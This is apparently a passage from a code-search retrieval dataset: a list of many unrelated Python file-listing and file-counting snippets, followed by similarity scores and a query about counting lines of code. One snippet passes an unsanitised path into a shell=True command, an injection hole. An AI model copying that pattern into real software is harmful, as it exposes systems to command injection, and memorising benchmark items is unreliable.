self.assertEqual(len(files['CLO Equity']), 2)\n self.assertEqual(files['ListCo Equity'][0], join(base_dir, 'ListCo Equity', 'Positions1219.xlsx'))", "def get_all_metrics(dir):\r\n file_lst = os.listdir(dir)\r\n file_lst = list(filter(lambda x: re.findall(r'\\.csv$',x), file_lst))\r\n return file_lst", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def current_missing(**kwargs) -> int:\n data_path = os.environ.get(BBG_ROOT, '').replace('\\\\', '/')\n if not data_path: return 0\n return len(files.all_files(f'{data_path}/Logs/{missing_info(**kwargs)}'))", "def getNtot(self,dir):\n return int(readfile(dir + '/struct_enum.out')[-1].split()[0])", "def test_known_file_locations(dataset: linux.LinuxSourcesDataset):\n assert (dataset.src_tree_root / \"kernel\" / \"kexec.c\").is_file()\n assert (dataset.src_tree_root / \"kernel\" / \"smpboot.h\").is_file()", "def usagestats_parse(dirpath):\r\n # Create database\r\n # TODO: change to an easier format, probably json.\r\n db, cursor = create_table()\r\n\r\n # Some vars for logging\r\n processed = 0\r\n err = 0\r\n\r\n # Iterate through the /usagestats/ directory and fetch all files\r\n for root, dirnames, filenames in os.walk(dirpath, topdown=True, onerror=None, followlinks=False):\r\n if 'daily' in root or 'weekly' in root or 'monthly' in root or 'yearly' in root:\r\n # Retrieve the folder name to save what the frequency of the usagestats were:\r\n frequency = root.split('/')[-1]\r\n for filename in filenames:\r\n # Check if filename is only numbers (which is an epoch time representation)\r\n if filename.isnumeric():\r\n try:\r\n tree = ET.parse(os.path.join(root, filename))\r\n except ET.ParseError:\r\n parse_file_with_protobuf(os.path.join(root, filename), db)\r\n continue\r\n\r\n # We have sucessfully parsed the usagestats xml.\r\n # So continue processing\r\n tree_root = tree.getroot()\r\n\r\n for elem in tree_root:\r\n parse_sub_elements(frequency, elem, filename, db)\r\n\r\n # query for reporting\r\n cursor.execute('''\r\n select \r\n usage_type,\r\n datetime(lastime/1000, 'UNIXEPOCH', 'localtime') as lasttimeactive,\r\n timeactive as time_Active_in_msecs,\r\n timeactive/1000 as timeactive_in_secs,\r\n case last_time_service_used WHEN '' THEN ''\r\n ELSE datetime(last_time_service_used/1000, 'UNIXEPOCH', 'localtime')\r\n end last_time_service_used,\r\n case last_time_visible WHEN '' THEN ''\r\n ELSE datetime(last_time_visible/1000, 'UNIXEPOCH', 'localtime') \r\n end last_time_visible,\r\n total_time_visible,\r\n app_launch_count,\r\n package,\r\n CASE types\r\n WHEN '1' THEN 'MOVE_TO_FOREGROUND'\r\n WHEN '2' THEN 'MOVE_TO_BACKGROUND'\r\n WHEN '5' THEN 'CONFIGURATION_CHANGE'\r\n WHEN '7' THEN 'USER_INTERACTION'\r\n WHEN '8' THEN 'SHORTCUT_INVOCATION'\r\n ELSE types\r\n END types,\r\n classs,\r\n source,\r\n fullatt\r\n from data\r\n order by lasttimeactive DESC\r\n ''')\r\n all_rows = cursor.fetchall()\r\n\r\n # HTML report section\r\n h = open('./Report.html', 'w')\r\n h.write('<html><body>')\r\n h.write('<h2>Android Usagestats report (Dates are localtime!)</h2>')\r\n h.write('<style> table, th, td {border: 1px solid black; border-collapse: collapse;}</style>')\r\n h.write('<br />')\r\n\r\n # HTML headers\r\n h.write('<table>')\r\n h.write('<tr>')\r\n h.write('<th>Usage Type</th>')\r\n h.write('<th>Last Time Active</th>')\r\n h.write('<th>Time Active in Msecs</th>')\r\n h.write('<th>Time Active in Secs</th>')\r\n h.write('<th>Last Time Service Used</th>')\r\n h.write('<th>Last Time Visible</th>')\r\n h.write('<th>Total Time Visible</th>')\r\n h.write('<th>App Launch Count</th>')\r\n h.write('<th>Package</th>')\r\n h.write('<th>Types</th>')\r\n h.write('<th>Class</th>')\r\n h.write('<th>Source</th>')\r\n h.write('</tr>')\r\n\r\n for row in all_rows:\r\n usage_type = row[0]\r\n lasttimeactive = row[1]\r\n time_Active_in_msecs = row[2]\r\n timeactive_in_secs = row[3]\r\n last_time_service_used = row[4]\r\n last_time_visible = row[5]\r\n total_time_visible = row[6]\r\n app_launch_count = row[7]\r\n package = row[8]\r\n types = row[9]\r\n classs = row[10]\r\n source = row[11]\r\n\r\n processed = processed + 1\r\n # report data\r\n h.write('<tr>')\r\n h.write('<td>' + str(usage_type) + '</td>')\r\n h.write('<td>' + str(lasttimeactive) + '</td>')\r\n h.write('<td>' + str(time_Active_in_msecs) + '</td>')\r\n h.write('<td>' + str(timeactive_in_secs) + '</td>')\r\n h.write('<td>' + str(last_time_service_used) + '</td>')\r\n h.write('<td>' + str(last_time_visible) + '</td>')\r\n h.write('<td>' + str(total_time_visible) + '</td>')\r\n h.write('<td>' + str(app_launch_count) + '</td>')\r\n h.write('<td>' + str(package) + '</td>')\r\n h.write('<td>' + str(types) + '</td>')\r\n h.write('<td>' + str(classs) + '</td>')\r\n h.write('<td>' + str(source) + '</td>')\r\n h.write('</tr>')\r\n\r\n # HTML footer\r\n h.write('<table>')\r\n h.write('<br />')\r\n\r\n print('')\r\n print('Records processed: ' + str(processed))\r\n print('Triage report completed. See Reports.html.')", "def avail(self):\n\n return os.listdir(self.datadir)", "def checkSumWalk(top=\".\", func=checkSumHelper):\n values = []\n os.path.walk( top, checkSumHelper, values )\n return sum(values)", "def MainStats(path, filetype, NrExp, col, start, stop):\n# path= path.split('/') # here is better to google and see what is going on. Or experiment alone\n# path= \"/\".join(path[:-1]) \n dato=ExtractData_raw_files(path, filetype)\n dBase=dato.createDictBase()\n stats = Stats(dBase, NrExp, col, start, stop)\n means, stds=stats.Means_Stds()\n times = stats.time_return()\n return means , stds, times", "def _get_filepaths(self):\n self._printer(str(self.__len__()) + \" file paths have been parsed in \" + str(self.timer.end))\n if self._hash_files:\n return pool_hash(self.filepaths)\n else:\n return self.filepaths", "def totalFiles(pathCopyData, pathNetCDF, dateInit, dateFinal):\n dateInit = datetime.strptime(dateInit, '%Y-%m-%d')\n dateFinal = datetime.strptime(dateFinal, '%Y-%m-%d')\n dirr = pathCopyData\n dirr2 = pathNetCDF\n #name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.\\d\\d\\d\\d.nc'\n name = 'wrfout_c1h_d01_\\d\\d\\d\\d-\\d\\d-\\d\\d_00:00:00.a\\d\\d\\d\\d'\n date = '\\d\\d\\d\\d-\\d\\d-\\d\\d'\n fil = []\n ba = []\n patron2 = re.compile(date)\n patron = re.compile(name + '.*')\n for base, dirs, files in os.walk(dirr2, topdown=True):\n for value in files:\n if patron.match(value) != None:\n f = patron2.findall(value)\n dateNetCDF = datetime.strptime(f[0], '%Y-%m-%d')\n if (dateNetCDF < dateFinal) & (dateNetCDF > dateInit):\n fil.append(value)\n ba.append(base)\n fdata = df.DataFrame(fil, columns=['nameFile'])\n fbase = df.DataFrame(ba, columns=['nameBase'])\n fdata.to_csv(dirr + 'tfile.txt', encoding='utf-8', index=False)\n fbase.to_csv(dirr + 'tbase.txt', encoding='utf-8', index=False)", "def totalfiles(self):\n return len([sz for sz in self.iterate()])", "def lsinfo(path):", "def enumerate():\n names = [f for f in os.listdir(_INPUT_ROOT) if not\n os.path.isdir(os.path.join(_INPUT_ROOT, f))]\n return sorted(names)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def _find_files(directory, dirs_to_look_in, files_to_search_for, \n current_dir, see_files):\n full_name = True\n if see_files:\n full_name = False\n files_to_load = search_directory(directory, \n look_in=dirs_to_look_in,\n search_for=files_to_search_for,\n file_type='files',\n current_dir=current_dir,\n full_name=full_name)\n if not files_to_load:\n raise UserWarning('No files were found matching the search for %s'\\\n ' in the directory(s) %s%s' \\\n % (files_to_search_for, directory, \n dirs_to_look_in))\n return files_to_load", "def findFiles(self):\n\n with open('analysis_result/firmwalkerOutput.txt', 'r') as firmwalker:\n for line in firmwalker:\n if line.startswith('##################################### ssh'):\n self.ssh = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### dropbear'):\n self.dropbear = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### busybox'):\n self.busyBox = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### telnet'):\n self.telnet = next(firmwalker).strip('d/').strip('\\n')\n elif line.startswith('##################################### openssl'):\n self.openssl = next(firmwalker).strip('d/').strip('\\n')", "def missing_in_gn_by_file(self):\n return self._missing_gn_files", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def dataStats(reportsDir = \"./reports/\"):\n legMulti = glob.glob(reportsDir+\"/leg/*.json\")\n legOne = glob.glob(reportsDir+\"/leg/oneproc/*.json\")\n legBroken = glob.glob(reportsDir+\"/leg/broken/*.json\")\n \n malMulti = glob.glob(reportsDir+\"/mal/*.json\")\n malOne = glob.glob(reportsDir+\"/mal/oneproc/*.json\")\n malBroken = glob.glob(reportsDir+\"/mal/broken/*.json\")\n \n print(\"\"\"Legal files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(legBroken+legMulti+legOne), len(legOne), len(legMulti), len(legBroken)))\n print(\"\"\"Malicious files:\n Total: {0}, One-proc: {1}, Multi-proc: {2}, Broken: {3} \"\"\"\n .format(len(malBroken+malMulti+malOne), len(malOne), len(malMulti), len(malBroken)))\n print(\"Working samples: {0}\".format(len(malMulti+malOne+legMulti+legOne)))", "def dirsize(self):\n total = 0\n for p in self.select_file(recursive=True):\n try:\n total += p.size\n except: # pragma: no cover\n print(\"Unable to get file size of: %s\" % p)\n return total", "def list_sources(config, base_dir, verbose=False):\n for source in config.sources_under(abspath(base_dir)):\n if verbose:\n print(\"# %s (%s)\" % (source.nicedir, ' '.join(source.info)))\n else:\n print(source.nicedir)", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def _local_dir(self):\n return []", "def check_init_files_and_folders():\n\t#['cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', 'cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', 'color_detect_2.py', 'dedupe.py', 'detect_image_group_ku.py', 'detect_shape_5.py', 'get_cam_id_2.py', 'get_image_8.py', 'gui_hsv.py', 'knaps.py', 'knapsack_2.py', 'maps.html', 'program_detect_rectangle.zip', 'start_capture.py']\n\tfile_list=[\n\t#'cascade_wimb_bus_front_100_stages_1000_pos_3000_neg.xml', \n\t'models/cascade_wimb_bus_front_33_stages_1000_pos_3000_neg_wrong.xml', \n\t#'color_detect_2.py', \n\t#'dedupe.py', \n\t'detect_bus_haar_group.py', \n\t#'detect_shape_5.py', \n\t'get_cam_detail.py', \n\t'get_image.py', \n\t#'gui_hsv.py', \n\t#'knaps.py', \n\t#'knapsack_2.py', \n\t#'maps.html', \n\t#'program_detect_rectangle.zip', \n\t'start_wimb.py',\n\t'g.php',\n\t]\n\tdirectory_list=[\n\t'images',\n\t'images_bgs',\n\t'images_bgs_mask',\n\t#'images_bgs_result',\n\t'images_color',\n\t'images_haar',\n\t'images_haar_result',\n\t'images_number',\n\t'images_number_result',\n\t'models',\n\t'images_old',\n\t'text_number',\n\t]\n\t\n\tfor file_name in file_list: print 'file '+file_name+' existed: '+str(os.path.isfile(file_name))\n\tfor directory_name in directory_list: \n\t\tprint 'directory '+directory_name+' existed: '+str(os.path.isdir(directory_name))\n\t\tif not os.path.isdir(directory_name): \n\t\t\tos.makedirs(directory_name)\n\t\tif \"images\" in directory_name: shutil.copy(path+'/g.php',path+'/'+directory_name+'/g.php')", "def get_num_samples(org_dir, file_names):\n count = 0\n # Loop through the files, which then loop through the trees\n for filename in file_names:\n # Skip files that are not .mrg\n if not filename.endswith('.mrg'):\n continue\n # File is .mrg. Start processing\n file_dir = os.path.join(org_dir, filename)\n with open(file_dir, 'r', encoding='utf-8') as reader:\n content = reader.readlines()\n for _ in content:\n count += 1\n\n return count", "def list_dir(self, path):", "def all_loci():\n for fname in listdir(join(DATA_PATH, 'loci')):\n try:\n yield fetch_locus(fname)\n except Exception as e:\n print(f'{repr(e)} fetching {fname}')", "def _discover_in_dir(self, dir_path: str) -> Optional[str]:\n for this_file in os.listdir(dir_path):\n if this_file.endswith('.esvi'):\n return os.path.join(dir_path, this_file)\n\n return None", "def _get_total_games(self) -> int:\n files = get_tfr_filenames(self.config)\n total_games = 0\n for file in files:\n total_games += int(str(file).split('-')[1].split('.')[0])\n return total_games", "def find_vasp_calculations():\n dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml\", recursive=True)\n ]\n gz_dir_list = [\n \"./\" + re.sub(r\"vasprun\\.xml\\.gz\", \"\", path)\n for path in glob.iglob(\"**/vasprun.xml.gz\", recursive=True)\n ]\n return dir_list + gz_dir_list", "def n_file(self):\n self.assert_is_dir_and_exists()\n n = 0\n for _ in self.select_file(recursive=True):\n n += 1\n return n", "def findMayaFiles(directory):\n\n pass", "def __calculate_current_row(self):\n last_data_file = None\n location = os.listdir(self.path)\n #Remove non-data files from our list of dirs.\n location = [element for element in location if 'data' in element]\n #Sort as integers so we get them in the right order.\n location = sorted(location, key=lambda x: int(x.split('.')[0].split('_')[1]), reverse = True)\n for f in location:\n if f[0:4] == 'data':\n last_line = None\n with open(self.path + '/' + f, 'r') as f:\n for line in f:\n if len(line) > 1:\n last_line = line\n if last_line:\n return json.loads(line)['row_id']\n\n return 0", "def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def import_directory(self, directory):\n files_list = sys_utils.get_files_from_directory(directory)\n if files_list == None:\n return None, 0\n oids = []\n num_new_files = 0\n p = progress.progress(len(files_list))\n for file_location in files_list:\n oid, new_file = self.import_file(file_location)\n p.tick()\n if oid:\n oids.append(oid)\n if new_file:\n num_new_files += 1\n oids = list(set(oids)) # assert uniqueness \n return oids, num_new_files", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def _get_base_files(self):\n setup_file = path.join(self.PyCogentDirectory, 'setup.py')\n #reqs_file = path.join(self.PyCogentDirectory, 'cogent-requirements.txt')\n #return [(setup_file, 'Python'), (reqs_file, 'Properties')]\n return [(setup_file, 'Python')]", "def get_nb_files(directory):\r\n if not os.path.exists(directory):\r\n return 0\r\n cnt = 0\r\n for r, dirs, files in os.walk(directory):\r\n for dr in dirs:\r\n cnt += len(glob.glob(os.path.join(r, dr + \"/*\"))) # glob模块是用来查找匹配文件的,后面接匹配规则。\r\n return cnt", "def file_stat(self, file_path):", "def main():\n results = []\n results.extend(check_mounts())\n results.extend(diskusage())\n return results", "def get_number_of_files(directory: str):\n\n number_of_files = len([item for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(number_of_files)\n return number_of_files", "def getNFiles(self, config, base, logger=None):\n if 'nfiles' in config:\n return galsim.config.ParseValue(config, 'nfiles', base, int)[0]\n else:\n return 189", "def get_info(self):\n if os.path.isfile(self.path):\n total_size = os.path.getsize(self.path)\n total_files = 1\n elif os.path.exists(self.path):\n total_size = 0\n total_files = 0\n for x in os.walk(self.path):\n for fn in x[2]:\n fpath = os.path.normpath(os.path.join(x[0], fn))\n rel_path = os.path.relpath(fpath, self.path)\n if any(fnmatch.fnmatch(rel_path, ext) for ext in self.exclude):\n continue\n fsize = os.path.getsize(fpath)\n if fsize and not is_hidden_file(fpath):\n total_size += fsize\n total_files += 1\n else:\n raise exceptions.InvalidInputException\n if not (total_files and total_size):\n raise exceptions.EmptyInputException\n if self.piece_size:\n ps = self.piece_size\n else:\n ps = 1 << max(0, math.ceil(math.log(total_size / 1500, 2)))\n if ps < MIN_PIECE_SIZE:\n ps = MIN_PIECE_SIZE\n if ps > MAX_PIECE_SIZE:\n ps = MAX_PIECE_SIZE\n return (total_size, total_files, ps, math.ceil(total_size / ps))", "def get_testing_data(self):\n\n print 'Loading testing data ', self.test_folder , '...'\n test_text = []\n cnt = 0\n\n for f in listdir(self.test_folder):\n file_path = join(self.test_folder, f)\n if isfile(file_path):\n cnt += 1\n if cnt % 10000 == 0:\n print 'finished:', cnt # line counter\n self.test_index.append(f[:-4])\n with open(file_path, 'rb') as f:\n test_text.append( f.read() )\n\n return test_text", "def summarize(path: str) -> dict:\n results = parse_bactopia_directory(path)", "def perform_calculations():\n # contains the result of the total repositories\n result = [] \n count_all_lines = 0 # mainatains the line that has been counted\n for_loops_list = []\n func_parameters = [] # function parameter checks list\n no_of_variables = set() # a set containing variables\n docs_comments = [] \n single_line_comments = []\n code_duplication = 0\n repo_imports_set = set() # imports for the entire repo\n current_repo = ''\n for item in traverse_repos():\n current_repo = item['repo_url']\n for path in item['files']:\n with open(path, 'r') as file_:\n lines = file_.readlines()\n # call code duplication\n code_duplication += code_duplication_check(lines)\n for line in lines:\n if re.match(r'^#.+', line.strip()):\n single_line_comments.append(line.strip())\n # this makes it possible to campare later\n # call find_repo_imports\n line_import = find_repo_imports(line)\n \n repo_imports_set.add(line_import)\n # call countlines of code function\n count_all_lines += count_lines_of_code(line.strip())\n # call find_for_loops\n for_loops = find_for_loops(line)\n if for_loops:\n for_loops_list.append(for_loops)\n function = avarage_parameters(line)\n if function:\n func_parameters.append(avarage_parameters(line))\n no_of_variables.add(avarage_variables_per_line(line))\n\n with open(path, 'r') as content_file:\n content = content_file.read()\n docs_comments.extend(find_docstrings_and_comments(content, single_line_comments))\n \n \n\n external_packages = find_external_packages(repo_imports_set)\n repo_lines_of_codes = count_all_lines - len(docs_comments)\n avarage_variables_repo = (len(no_of_variables)-1) / repo_lines_of_codes\n nesting = nesting_depth(for_loops_list) / len(for_loops_list)\n avarage_params = sum(func_parameters) / len(func_parameters)\n repo_result = {\n 'repository_url': current_repo, \n 'number of lines': repo_lines_of_codes, \n 'libraries': external_packages,\n 'nesting factor': nesting,\n 'code duplication': code_duplication,\n 'average parameters': avarage_params,\n 'average variables': avarage_variables_repo\n \n }\n result.append(repo_result)\n\n return result", "def read_file_names(self):\n files_BIDMC = os.listdir(self.root_dir_BIDMC)\n masks_BIDMC = os.listdir(self.seg_dir_BIDMC)\n files_HK = os.listdir(self.root_dir_HK)\n masks_HK = os.listdir(self.seg_dir_HK)\n files_I2CVB = os.listdir(self.root_dir_I2CVB)\n masks_I2CVB = os.listdir(self.seg_dir_I2CVB)\n files_ISBI = os.listdir(self.root_dir_ISBI)\n masks_ISBI = os.listdir(self.seg_dir_ISBI)\n files_ISBI_15 = os.listdir(self.root_dir_ISBI_15)\n masks_ISBI_15 = os.listdir(self.seg_dir_ISBI_15)\n files_UCL = os.listdir(self.root_dir_UCL)\n masks_UCL = os.listdir(self.seg_dir_UCL)\n site_files = [files_BIDMC, files_HK, files_I2CVB, files_ISBI, files_ISBI_15, files_UCL]\n site_masks = [masks_BIDMC, masks_HK, masks_I2CVB, masks_ISBI, masks_ISBI_15, masks_UCL]\n return site_files, site_masks", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def compute_code():\n for file in os.listdir('./src/Templates'):\n input.parse_template('./src/Templates/' + file, './student/' + file + '.py')\n data = input.load_input()\n return len([k for k in data['input'].keys() if '@' not in k])", "def calculate(d):\r\n\r\n # Set correct slashes for the OS\r\n if sys.platform == 'windows':\r\n slash = '\\\\'\r\n elif sys.platform == 'linux':\r\n slash = '/'\r\n else:\r\n print('#Error. Unknown platform.')\r\n return\r\n\r\n print('Files in the current directory and their md5-hashes:\\n')\r\n i = 0\r\n assert i == 0, '#Error. Variable i != 0.'\r\n\r\n for i in range(len(d[2])): # Go through the list of files\r\n full_path = d[0]+slash+d[2][i]\r\n print(full_path) # Get the list of files with full paths\r\n print(md5(full_path))\r\n size(full_path)", "def find_data(self):\n data_list = []\n for root, dirs, files in os.walk(pathfinder.data_path()):\n for name in files:\n data_list.append(os.path.join(root, name))\n return data_list", "def count_files_dir(self,full_path):\n try:\n num_files = len([name for name in os.listdir(full_path) if os.path.isfile(self.FILENAME)])\n print(f\"Number of files in {full_path} is {num_files}\")\n return num_files\n except Exception as e:\n raise SystemExit(f\"Could not complete operation: {e}\")", "def read_inputs(self):\n curdir = os.getcwd()\n os.chdir(self.fst_dir)\n rstat = self.readFST()\n if rstat == 0:\n os.chdir(curdir)\n return 0\n # the names of the next files are either set by caller or come from the reading the FAST file\n rstat = self.readNoise()\n rstat = self.readAD()\n rstat = self.readBlade()\n rstat = self.readPtfm()\n os.chdir(curdir)", "def getAllVCFs(inputFolder):\n listOfFiles = []\n numErrors = 0\n for folder in os.listdir(inputFolder): #Loop through all folders\n # print(folder)\n try: # using a try-xcept block to avoid errors with other files \n # not following this structure\n # TODO: make this cleaner\n vcfLoc = os.path.join(inputFolder, os.path.join(folder, \"pilon/\"))\n # print(vcfLoc)\n for potentialFile in os.listdir(vcfLoc):\n # print(potentialFile)\n if(potentialFile.endswith(\".vcf.gz\")):\n listOfFiles.append(os.path.join(vcfLoc, potentialFile))\n except:\n # print(\"error at \" + folder)\n numErrors += 1\n print(numErrors)\n return listOfFiles", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def get_amount_by_file(path):\n if os.stat(path).st_size == 0:\n raise Exception\n with open(path, 'r') as file:\n items = file.read().split(',')\n total = reduce(lambda x, y: int(x) + int(y), items)\n return total", "def readNSRelaxFiles(folder_path):\n\n run_arr = []\n Nrun_arr = []\n dod_arr = []\n crate_arr = []\n count=0\n\n # find number of files that starts with run\n # (this is the data file we want to read)\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun\"):\n count+=1\n\n # order the data files by run number, so we get descending crates\n Nrun=1\n for i in range(count+5):\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun_\"+str(Nrun)+\"_\"):\n run_arr.append(file)\n dod = re.search('dod=(.*).txt', file).group(1)\n crate = re.search('Crate=(.*)_',file).group(1)\n Nrun_arr.append(np.round(int(Nrun),decimals=0))\n dod_arr.append(float(dod))\n crate_arr.append(float(crate))\n Nrun+=1\n print(len(run_arr))\n\n return run_arr, Nrun_arr, dod_arr, crate_arr", "def _determine_local_import_names(start_dir):\n file_ext_pairs = [os.path.splitext(path) for path in os.listdir(start_dir)]\n return [\n basename\n for basename, extension\n in file_ext_pairs\n if extension == '.py' or os.path.isdir(\n os.path.join(start_dir, basename))\n and basename not in ('__pycache__')]", "def get_results_labels(dir_path):\n dx = 0\n directories = [dI for dI in os.listdir(dir_path)\n if os.path.isdir(os.path.join(dir_path, dI))]\n results = []\n\n for directory in directories:\n # collect the path to all results files\n path = os.path.join(dir_path, directory)\n files = [os.path.join(path, f) for f in os.listdir(path)\n if os.path.isfile(os.path.join(path, f))\n and 'results' in f]\n\n # if the directory does not have results files, move on to the next\n if len(files) == 0:\n continue\n\n # collect the average cumulative returns per training iteration\n res = []\n lengths = []\n for i, f in enumerate(files):\n data = pd.read_csv(f)\n if i == 0:\n dx = data['total/steps'][2] - data['total/steps'][1]\n res.append(data['rollout/return_history'])\n lengths.append(len(data['rollout/return_history']))\n\n res = [[r[:min(lengths)]] for r in res]\n results.append(np.concatenate(res, axis=0))\n\n return results, directories, dx", "def get_python_files(all_files=None):\n if all_files is None:\n all_files = ci_diff_helper.get_checked_in_files()\n\n production_files = []\n test_files = []\n for filename in all_files:\n if not valid_filename(filename):\n continue\n if is_test_filename(filename):\n test_files.append(filename)\n else:\n production_files.append(filename)\n\n return production_files, test_files", "def reportinfo(self):\n return super().reportinfo()[:2] + (self.fspath.relto(os.getcwd()),)", "def count_dirs_and_files(directory='.'):\n pass", "def ttl_files_in_dir(dir_path, pat='.'):\n if not path.isdir(dir_path):\n raise NotADirectoryError\n\n # In a subprocess, count list the files in the dir and count them, convert output to an int\n ttl = int(check_output('ls -A -U --color=never {} | grep {} | wc -l'.format(dir_path, pat), shell=True).strip())\n\n return ttl", "def count(train_dir):\r\n path = train_dir\r\n count = 0\r\n for fn in os.listdir(path): #fn 表示的是文件名\r\n count = count + 1\r\n return count", "def _gather_path(self, comp, path, function_map):\n print(f'\"Analyzing {comp} at {path}')\n if not os.path.exists(path):\n print('No files in {path}')\n return\n\n for root, _dirs, files in os.walk(path):\n if self.excluded(root):\n continue\n if not self.included(root, self.dir_inclusions):\n continue\n for fname in files:\n if not self.included(fname, self.file_inclusions):\n continue\n if fname.endswith(\".su\"):\n with open(os.path.join(root, fname), \"r\") as frame:\n for line in frame.readlines():\n split = line.split()\n if len(split) < 3:\n continue\n func = f\"{comp}:{split[0]}\"\n usage = int(split[-2])\n if usage < self.cutoff:\n continue\n if func not in function_map:\n function_map[func] = usage\n elif usage > function_map[func]:\n function_map[func] = usage" ]
[ "0.63941246", "0.6148792", "0.5896523", "0.5792946", "0.56846035", "0.5674842", "0.56738776", "0.56557024", "0.5595728", "0.55465335", "0.55265635", "0.5509024", "0.5490125", "0.54562646", "0.53724253", "0.53600603", "0.53305817", "0.5296591", "0.52905095", "0.52354455", "0.52294916", "0.52220196", "0.5198103", "0.5195978", "0.5186539", "0.51656497", "0.5163649", "0.51358575", "0.5120946", "0.51164967", "0.51098484", "0.51092833", "0.50853574", "0.5083181", "0.5081521", "0.5078778", "0.5077839", "0.50759494", "0.50725037", "0.5071149", "0.50593597", "0.50585854", "0.5058144", "0.50517154", "0.5050045", "0.504794", "0.50477606", "0.5043572", "0.50417614", "0.5040509", "0.503812", "0.50328654", "0.5029637", "0.50265723", "0.5007045", "0.50036335", "0.5002633", "0.49971974", "0.49948022", "0.4990057", "0.4989779", "0.49896127", "0.49869934", "0.49868932", "0.4984892", "0.49808612", "0.49776876", "0.4973755", "0.49726373", "0.49718317", "0.4969438", "0.49547297", "0.49531397", "0.494195", "0.49412704", "0.4932267", "0.49320176", "0.49248803", "0.4924772", "0.49236137", "0.49229372", "0.492181", "0.49179047", "0.49156964", "0.49108875", "0.4906544", "0.49041307", "0.49031678", "0.48896712", "0.48881805", "0.4885496", "0.48829335", "0.48813263", "0.48789862", "0.48754758", "0.4871829", "0.4867939", "0.48621118", "0.48555622", "0.4850242" ]
0.6992177
0
Returns the total, nonblank and net loc for all the python files in a directory
